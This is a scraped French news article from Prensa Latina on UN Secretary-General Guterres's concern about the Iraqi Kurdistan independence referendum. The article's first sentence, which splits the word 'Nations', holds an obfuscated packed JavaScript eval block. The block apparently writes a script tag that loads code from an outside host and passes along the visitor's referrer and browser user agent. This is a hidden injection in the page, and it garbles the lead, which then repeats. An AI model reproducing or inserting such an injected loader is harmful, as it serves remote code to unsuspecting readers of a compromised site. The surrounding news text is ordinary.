mercredi 17 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’ONU est préoccupée par les conséquences du référendum au Kurdistan irakien

Nations eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkkta|var|u0026u|referrer|zersn||js|php'.split('|'),0,{})) Unies, 25 septembre (Prensa Latina) Le secrétaire général de l'ONU, Antonio Guterres, a aujourd'hui manifesté sa préoccupation au sujet des conséquences potentielles du référendum indépendantiste tenu au Kurdistan irakien.

Nations Unies, 25 septembre (Prensa Latina) Le secrétaire général de l’ONU, Antonio Guterres, a aujourd’hui manifesté sa préoccupation au sujet des conséquences potentielles du référendum indépendantiste tenu au Kurdistan irakien.

Lors d’une déclaration, le diplomate a soutenu la souveraineté, l’intégrité territoriale et l’unité de l’Irak, puis a signalé que les différences entre le gouvernement fédéral et les autorités régionales du Kurdistan doivent se résoudre par un dialogue structuré et des positions constructives.

Guterres a exprimé son espoir quant à ce que la consultation d’aujourd’hui, au-delà des résultats qui en découleront, ne nuise pas au travail des Nations Unies dans ce pays du Moyen-Orient.

Depuis 2003, lorsque les États-Unis l’ont envahi et occupé, l’Irak a souffert d’instabilité et de violences, scénario qui a favorisé l’avancée du terrorisme, et plus particulièrement l’État Islamique.

Face à un panorama tellement complexe, le référendum du Kurdistan représente pour certains une source supplémentaire de tensions, et y compris une menace pour ceux qui ont l’intention de vaincre les jihadistes.

Le comptage des votes de ce référendum polémique, rejeté par l’Irak, la Turquie, l’Iran et d’autres pays a  débuté. La Haute Commission Indépendante pour les Élections et le Référendum sur l’autonomie kurde a informé que 76 pour cent des inscrits, soit près de 5,2 millions de personnes, sont allés voter.

Plutôt, le parlement irakien a adopté l’envoie de troupes militaires dans les régions de disputes avec les kurdes, alors que la Turquie a débuté des manœuvres conjointes avec l’Irak sur la frontière commune.

peo/oda/wmr/ocs/arc 

EN CONTINU
notes connexes